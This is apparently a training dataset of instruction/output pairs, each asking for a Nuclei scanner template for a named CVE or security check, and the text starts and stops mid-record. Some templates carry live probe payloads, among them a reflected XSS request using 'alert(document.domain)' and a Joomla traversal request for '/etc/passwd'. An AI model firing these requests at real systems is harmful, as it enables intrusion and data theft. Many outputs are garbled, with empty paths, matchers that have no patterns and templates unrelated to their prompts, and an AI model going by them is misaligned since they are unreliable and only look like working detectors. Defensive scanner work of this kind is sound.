6.00 was discovered to contain a command injection vulnerability via network_test.php\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: contec solarview_compact_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-40881\n\ninfo:\n name: SolarView 6.00 - Remote Command Execution\n author: For3stCo1d\n severity: critical\n description: SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n tags: cve,cve2022,solarview,rce,lfi,contec,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-40881"} {"instruction": "Generate a Nuclei template for CVE-2024-42852", "input": "Title: Cross-Site Scripting (XSS) in CVE-2024-42852\nSummary: Cross Site Scripting vulnerability in AcuToWeb server v.10.5.0.7577C8b allows a remote attacker to execute arbitrary code via the index.php component.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-42852\n\ninfo:\n name: AcuToWeb server/10.5.0.7577c8b - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: AcuToWeb server/10.5.0.7577c8b is vulnerable to reflected cross-site scripting (XSS) via the portgw parameter. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.\n tags: cve,cve2024,xss,acutoweb,opentext,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?portgw=80089948;%20alert(document.domain)\" \n matchers:\n - type: word\n words:\n - \"80089948; alert(document.domain);\" \n - \"WT_GW_PORT\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-42852"} {"instruction": "Generate a Nuclei template for CVE-2022-4375", "input": "Title: Vulnerability (CWE-707) in mingsoft mcms\nSummary: A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.\nVulnerability Type: Vulnerability (CWE-707)\nSeverity: medium\nAffected Products: mingsoft mcms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4375\n\ninfo:\n name: Mingsoft MCMS - SQL Injection\n author: ritikchaddha\n severity: critical\n description: SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.\n tags: cve,cve2022,mingsoft,mcms,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"mingsoft.net\" \n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"java.sql.SQLSyntaxErrorException\" \n - \"java.sql.SQLException\" \n part: body\n condition: or\n - type: word\n words:\n - \"Icategorydao.xml\" \n - \"cms_category\" \n part: body\n condition: or\n - type: status\n status:\n - 500", "category": "cve", "severity": "medium", "id": "CVE-2022-4375"} {"instruction": "Generate a Nuclei template for: OpenMetadata - Default Login", "input": "Title: OpenMetadata - Default Login\nSummary: OpenMetadata - Default Login. OpenMetadata server enables default admin credentials. An attacker can execute unauthorized operations.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: openmetadata-default-login\n\ninfo:\n name: OpenMetadata - Default Login\n author: icarot\n severity: high\n description: OpenMetadata server enables default admin credentials. An attacker can execute unauthorized operations.\n tags: openmetadata,default-login,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"accessToken\":\" \n - \"\"refreshToken\":\" \n - \"\"expiryDuration\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "openmetadata-default-login"} {"instruction": "Generate a Nuclei template for: FileZilla FTP Service - Detect", "input": "Title: FileZilla FTP Service - Detect\nSummary: FileZilla FTP Service - Detect. FileZilla FTP service was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: filezilla-ftp-detect\n\ninfo:\n name: FileZilla FTP Service - Detect\n author: pussycat0x\n severity: info\n description: FileZilla FTP service was detected.\n tags: network,ftp,filezilla,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "filezilla-ftp-detect"} {"instruction": "Generate a Nuclei template for: Apache Answer - Detection", "input": "Title: Apache Answer - Detection\nSummary: Apache Answer - Detection. Detects Apache Answer version through API endpoit\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-answer-detect\n\ninfo:\n name: Apache Answer - Detection\n author: omranisecurity\n severity: info\n description: Detects Apache Answer version through API endpoit\n tags: detect,tech,apache,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/answer/api/v1/siteinfo\" \n matchers:\n - type: word\n words:\n - \"\"code\":\" \n part: body\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "apache-answer-detect"} {"instruction": "Generate a Nuclei template for: WordPress Video Gallery <= 2.8 - SQL Injection", "input": "Title: WordPress Video Gallery <= 2.8 - SQL Injection\nSummary: WordPress Video Gallery <= 2.8 - SQL Injection. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: contus-video-gallery-sqli\n\ninfo:\n name: WordPress Video Gallery <= 2.8 - SQL Injection\n author: theamanrawat\n severity: critical\n description: The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.\n tags: sqli,wpscan,wordpress,contus-video-gallery,unauth,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25b\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "contus-video-gallery-sqli"} {"instruction": "Generate a Nuclei template for: Smush Image Optimization \u2013 Optimize Images | Compress & Lazy Load Images | Convert WebP & AVIF | Image CDN Detection", "input": "Title: Smush Image Optimization \u2013 Optimize Images | Compress & Lazy Load Images | Convert WebP & AVIF | Image CDN Detection\nSummary: Smush Image Optimization \u2013 Optimize Images | Compress & Lazy Load Images | Convert WebP & AVIF | Image CDN Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wp-smushit\n\ninfo:\n name: Smush Image Optimization \u2013 Optimize Images | Compress & Lazy Load Images | Convert WebP & AVIF | Image CDN Detection\n author: ricardomaia\n severity: info\n description: Smush Image Optimization \u2013 Optimize Images | Compress & Lazy Load Images | Convert WebP & AVIF | Image CDN Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wp-smushit"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: adobe-media-server\n\ninfo:\n name: Adobe Media Server Login Panel\n author: dhiyaneshDK\n severity: info\n description: An Adobe Media Server login panel was detected.\n tags: panel,adobe,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Adobe Media Server\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2025-1661", "input": "Title: Path Traversal in pluginus husky_-_products_filter_professional_for_woocommerce\nSummary: The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the 'template' parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: pluginus husky_-_products_filter_professional_for_woocommerce\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-1661\n\ninfo:\n name: HUSKY \u2013 Products Filter Professional for WooCommerce <= 1.3.6.5 - Unauthenticated Local File Inclusion\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the 'template' parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.\n tags: cve,cve2025,woocommerce-products-filter,wordpress,wp-plugin,wp,woocommerce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-1661"} {"instruction": "Generate a Nuclei template for CVE-2022-0189", "input": "Title: Cross-Site Scripting (XSS) in wprssaggregator wp_rss_aggregator\nSummary: The WP RSS Aggregator WordPress plugin before 4.20 does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: wprssaggregator wp_rss_aggregator\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0189\n\ninfo:\n name: WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.\n tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-0189"} {"instruction": "Generate a Nuclei template for: OpenSign Login Panel - Detect", "input": "Title: OpenSign Login Panel - Detect\nSummary: OpenSign Login Panel - Detect. OpenSign Login panel was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: opensign-panel\n\ninfo:\n name: OpenSign Login Panel - Detect\n author: righettod\n severity: info\n description: OpenSign Login panel was discovered.\n tags: panel,opensign,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/locales/en/translation.json\" \n - \"{{BaseURL}}/\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "opensign-panel"} {"instruction": "Generate a Nuclei template for: TFTP Service Should Be Disabled", "input": "Title: TFTP Service Should Be Disabled\nSummary: TFTP Service Should Be Disabled. The tftp service was rarely needed and contained known vulnerabilities that could have been targeted by attackers.It was checked to confirm that the tftp service was properly disabled in the xinetd configuration.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tftp-service-enabled\n\ninfo:\n name: TFTP Service Should Be Disabled\n author: songyaeji\n severity: info\n description: The tftp service was rarely needed and contained known vulnerabilities that could have been targeted by attackers.It was checked to confirm that the tftp service was properly disabled in the xinetd configuration.\n tags: linux,local,code,audit,compliance,kisas\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "tftp-service-enabled"} {"instruction": "Generate a Nuclei template for CVE-2025-26793", "input": "Title: Vulnerability (CWE-1393) in CVE-2025-26793\nSummary: The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE: the Supplier's perspective is that the \"vulnerable systems are not following manufacturers' recommendations to change the default password.\"\nVulnerability Type: Vulnerability (CWE-1393)\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-26793\n\ninfo:\n name: FREEDOM Administration - Default Login\n author: Eric Daigle,DhiyaneshDK\n severity: critical\n description: The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE- the Supplier's perspective is that the \"vulnerable systems are not following manufacturers' recommendations to change the default password.\"\n tags: cve,cve2025,freedom,admin,mesh,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Administration: Controlled Areas\" \n - \"Log Out\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2025-26793"} {"instruction": "Generate a Nuclei template for: Disable SSH Root Login", "input": "Title: Disable SSH Root Login\nSummary: Disable SSH Root Login. Disabling direct root login can help prevent unauthorized users from gaining full control over your system.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: file-disable-root-login\n\ninfo:\n name: Disable SSH Root Login\n author: pussycat0x\n severity: info\n description: Disabling direct root login can help prevent unauthorized users from gaining full control over your system.\n tags: audit,config,file,ssh\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "file-disable-root-login"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: wago-plc-panel\n\ninfo:\n name: WAGO PLC Panel - Detect\n author: github.com/its0x08\n severity: info\n description: WAGO PLC panel was detected.\n tags: panel,wago,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plc/webvisu.htm\" \n matchers:\n - type: word\n words:\n - \"CoDeSys WebVisualization\" \n - \"webvisu.jar,minml.jar\" \n part: body\n condition: or\n - type: word\n words:\n - \"WAGO_Webs\" \n part: header", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2024-21633", "input": "Title: Path Traversal in apktool apktool\nSummary: Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either user name is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: apktool apktool\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-21633\n\ninfo:\n name: MobSF - Path Traversal\n author: Will Mccardell\n severity: high\n description: MobSF is vulnerable to an issue with apktool (CVE-2024-21633) that allows for RCE or arbitrary file writing. It does this through a path traversal vulnerability. This template tests for it by writing to a local file and reading that file. RCE can be achieved by overwriting jadx, as shown in the two POCs listed as references. The payload for this template exists inside the binary format of an APK, which is a zip file. This means that a hardcoded random hex string is checked for, rather than a standard dynamic random string.\n tags: cve,cve2024,mobsf,intrusive,rce,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"4acbfc74a3002cecf92e81c2a9ac75ada8acabf8f7b40706c5667efbd33be8450d67a3f2f7234f0cd3873de5fee64643d4bd5ed23a1f2c295c7ea0dabcb522ca420f2d91afcfe5b62708c9b90d51dc4ae5a81d7f2ea1befafa31920565074032a2775427dfffe63e97d46e89bcec3cd7ca81411609d98a5c4b1264db69bfe76c\" \n part: body_4\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-21633"} {"instruction": "Generate a Nuclei template for: Jeecg Boot Swagger Bootstrap UI - Detect", "input": "Title: Jeecg Boot Swagger Bootstrap UI - Detect\nSummary: Jeecg Boot Swagger Bootstrap UI - Detect. Jeecg Swagger Bootstrap UI exposed.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: jeecg-boot-swagger\n\ninfo:\n name: Jeecg Boot Swagger Bootstrap UI - Detect\n author: ritikchaddha\n severity: info\n description: Jeecg Swagger Bootstrap UI exposed.\n tags: jeecg,swagger,detect,exposure,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jeecg-boot/\" \n matchers:\n - type: word\n words:\n - \"Swagger-Bootstrap-UI\" \n part: body", "category": "generic", "severity": "info", "id": "jeecg-boot-swagger"} {"instruction": "Generate a Nuclei template for: SOPlanning - Default Login", "input": "Title: SOPlanning - Default Login\nSummary: SOPlanning - Default Login. SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: soplanning-default-login\n\ninfo:\n name: SOPlanning - Default Login\n author: s4e-io\n severity: high\n description: SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n tags: soplanning,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"title=\"Logout\"\" \n - \"title=\"Modify my profile\"\" \n - \"Settings\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "soplanning-default-login"} {"instruction": "Generate a Nuclei template for: Azure Public IP Create/Update Alert Not Configured", "input": "Title: Azure Public IP Create/Update Alert Not Configured\nSummary: Azure Public IP Create/Update Alert Not Configured. Ensure that activity log alerts are used to detect \"Create or Update Public IP Address\" events within your Microsoft Azure cloud account. An activity log alert gets activated when a new activity log event that matches the condition specified in the alert occurs.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-public-ip-update-unalerted\n\ninfo:\n name: Azure Public IP Create/Update Alert Not Configured\n author: princechaddha\n severity: high\n description: Ensure that activity log alerts are used to detect \"Create or Update Public IP Address\" events within your Microsoft Azure cloud account. An activity log alert gets activated when a new activity log event that matches the condition specified in the alert occurs.\n tags: cloud,devops,azure,microsoft,public-ip,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-public-ip-update-unalerted"} {"instruction": "Generate a Nuclei template for: BSPHP - Information Disclosure", "input": "Title: BSPHP - Information Disclosure\nSummary: BSPHP - Information Disclosure. Information disclosure in BSPHP Pro causing user and unauth IP disclosure.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: bsphp-info\n\ninfo:\n name: BSPHP - Information Disclosure\n author: ritikchaddha\n severity: low\n description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.\n tags: bsphp,info,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0\" \n matchers:\n - type: word\n words:\n - \"{\"data\":\" \n - \"\"id\"\" \n - \"\"user\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "bsphp-info"} {"instruction": "Generate a Nuclei template for: Remote System Forced Shutdown Privilege Check", "input": "Title: Remote System Forced Shutdown Privilege Check\nSummary: Remote System Forced Shutdown Privilege Check. Ensure the \"Force shutdown from a remote system\" policy (SeRemoteShutdownPrivilege) is assigned only to the Administrators group (SID: S-1-5-32-544). Granting this privilege to unauthorized accounts can allow attackers to remotely shut down the system, posing a significant risk.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: remote-system-shutdown\n\ninfo:\n name: Remote System Forced Shutdown Privilege Check\n author: nukunga[SungHyunJeon]\n severity: medium\n description: Ensure the \"Force shutdown from a remote system\" policy (SeRemoteShutdownPrivilege) is assigned only to the Administrators group (SID: S-1-5-32-544). Granting this privilege to unauthorized accounts can allow attackers to remotely shut down the system, posing a significant risk.\n tags: policy,code,windows-audit,kisa\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "remote-system-shutdown"} {"instruction": "Generate a Nuclei template for CVE-2010-1533", "input": "Title: Path Traversal in peter_hocherl com_tweetla\nSummary: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: peter_hocherl com_tweetla\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-1533\n\ninfo:\n name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve2010,cve,joomla,lfi,edb,peter_hocherl,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2010-1533"} {"instruction": "Generate a Nuclei template for: bluelight Malware Hash - Detect", "input": "Title: bluelight Malware Hash - Detect\nSummary: bluelight Malware Hash - Detect. North Korean origin malware which uses a custom Google App for C2 communications.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: bluelight-malware-hash\n\ninfo:\n name: bluelight Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: North Korean origin malware which uses a custom Google App for C2 communications.\n tags: malware,inkysquid\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "bluelight-malware-hash"} {"instruction": "Generate a Nuclei template for: Accellion - Detect", "input": "Title: Accellion - Detect\nSummary: Accellion - Detect. Dectection of Accellion File Transfer Appliance.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: accellion-detect\n\ninfo:\n name: Accellion - Detect\n author: rxerium\n severity: info\n description: Dectection of Accellion File Transfer Appliance.\n tags: accellion,tech,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cfadmin/\" \n matchers:\n - type: word\n words:\n - \"/cfadmin/img/accellion-logo.png\" \n - \"secured by accellion\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "accellion-detect"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: phpmyadmin-default-login\n\ninfo:\n name: phpMyAdmin - Default Login\n author: Natto97,notwhy\n severity: high\n description: phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n tags: default-login,phpmyadmin,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: Favicon based AEM Detection", "input": "Title: Favicon based AEM Detection\nSummary: Favicon based AEM Detection. Tags: aem, favicon, tech\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: aem-detect\n\ninfo:\n name: Favicon based AEM Detection\n author: shifacyclewala,hackergautam\n severity: info\n description: Favicon based AEM Detection\n tags: aem,favicon,tech,adobe,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/libs/granite/core/content/login/favicon.ico\" \n matchers:\n - type: dsl", "category": "generic", "severity": "info", "id": "aem-detect"} {"instruction": "Generate a Nuclei template for CVE-2020-35986", "input": "Title: Cross-Site Scripting (XSS) in rukovoditel rukovoditel\nSummary: A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: rukovoditel rukovoditel\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-35986\n\ninfo:\n name: Rukovoditel <= 2.7.2 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2020-35986"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: unauth-xproxy-dashboard\n\ninfo:\n name: X-Proxy Dashboard Panel - Detect\n author: pussycat0x\n severity: info\n description: X-Proxy Dashboard panel was detected.\n tags: xproxy,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"X-Proxy\" \n - \"Dashboard\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Slack User token disclosure", "input": "Title: Slack User token disclosure\nSummary: Slack User token disclosure. Tags: exposure, token, slack\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: slack-user-token\n\ninfo:\n name: Slack User token disclosure\n author: Ice3man,DhiyaneshDK\n severity: high\n description: Slack User token disclosure\n tags: exposure,token,slack,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "slack-user-token"} {"instruction": "Generate a Nuclei template for CVE-2021-34621", "input": "Title: Vulnerability (CWE-269) in properfraction profilepress\nSummary: A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. .\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: critical\nAffected Products: properfraction profilepress\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-34621\n\ninfo:\n name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness\n author: 0xsapra\n severity: critical\n description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.\n tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Welcome to your WordPress Dashboard\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-34621"} {"instruction": "Generate a Nuclei template for: SARG Security Checks", "input": "Title: SARG Security Checks\nSummary: SARG Security Checks. A simple workflow that runs all SARG related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sarg-workflow\n\ninfo:\n name: SARG Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all SARG related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sarg-workflow"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of 